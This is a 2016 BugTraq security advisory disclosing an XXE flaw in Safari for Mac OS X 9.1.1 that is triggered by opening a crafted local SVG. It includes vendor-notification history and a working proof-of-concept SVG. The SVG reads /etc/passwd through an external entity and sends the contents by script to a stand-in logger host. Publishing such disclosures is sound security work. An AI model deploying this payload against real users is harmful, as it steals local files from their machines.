BugTraq
Apple Safari for Mac OS X SVG local XXE Jul 05 2016 08:12AM
Filippo Cavallarin (filippo cavallarin wearesegment com)
Advisory ID: SGMA16-003
Title: Apple Safari for Mac OS X SVG local XXE
Product: Apple Safari for Mac OS X
Version: 9.1.1 and probably prior
Vendor: apple.com
Vulnerability type: XXE
Risk level: Medium
Credit: Filippo Cavallarin - wearesegment.com
CVE: N/A
Vendor notification: 2015-04-08
Vendor fix: N/A
Public disclosure: 2016-07-05

Details

Safari for MACOSX is prone to an XXE vulnerability when processing crafted SVG images.
An attacker may use this vulnerability to steal files from local computer by tricking a user
into opening and SVG image from a local location (ie USB key).
This vulnerability is mitigated by the file quarantine and do not work with downloaded files.

Proof of concept:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg [
<!ELEMENT svg ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg version="1.0" xmlns="http://www.w3.org/2000/svg" width="19000px" xmlns:xlink="http://www.w3.org/1999/xlink" >
<text x="-1000" y="-1000" >&xxe;</text>
<circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
<script>
var logger = "http://logger.local/?file=" + encodeURIComponent(document.getElementsByTagName("text")[0].innerHTML);
document.createElementNS('http://www.w3.org/2000/svg','image').setAttrib
uteNS('http://www.w3.org/1999/xlink','href', logger);

</script>

</svg>

Notes

The vendor has been notified more than one year before public disclosure and the answer was that the issue was
still under analisys. We contacted the vendor again a few weeks before public disclosure but we got no reply.

Solution

N/A

References

https://www.wearesegment.com/research/Apple-Safari-for-Mac-OS-X-SVG-loca
l-XXE

-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org

iQIcBAEBCgAGBQJXe2vsAAoJENKaW7brYyGoFlUP/ibdR7ztrcuBXlvRZpoTpMAR
szEBrXYd2ZBXBKYI9J+BEsDPh2VFOL0J5nvhnLmWRj963Br7bx2eKo1vjbIIQRfS
SV+5CRHRJkvYf+pl4O9XA3tBlDehcb8eZkdIIy55Bk5ex1r0wgGGFXI+8OZbY8bO
ZE9vM4cZEIZ+jgpNf3ztlFSslCsFe0vmznoUyBTaBBnmakTwRXVJlL5+unJuTIUC
NTuvel/nNTGb0wzhEG8xyMl2n4os0LddO1+Xt8NVYZ0xibyRWDd393S0awZ3+hq+
AQIWs0kr9LfNZ5lteaS5VcS0d895qvCH7+UJdIJi4Nl1mKqUV9vYw+DmAGTWjnon
NCzUcl5JQTVM4iSPdfxIpLA5NAsfIHsGF4CwLG2lbMlCgKiM4gh2vE7KV+tTPKN4
XsIU2az3ZQCKZWjZMKsNb+9rRT7zIt1Uj2tFKqzK/YtroXtUIW1Zca7E9PqEf1GS
Q1+UrK6xy8D4TnGSoorqESKBLAp9csLdHgGSuitggamg8irRaQ9iwwqHBYc4bhtq
kNQPxHhCCKPRglsoqjkNzPKoGiqM4kUICSrFIXJH3rlX+1zdpaBfhjGzCaiOzN7h
K9gkv6qWRrc2dgci5OqXtAGbOEaJT4mRqBSOU9rv/0WdLBfkNLCO92IxBv1LoEEn
QOaUSQej4VD10WXinhlv
=Ua3A
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus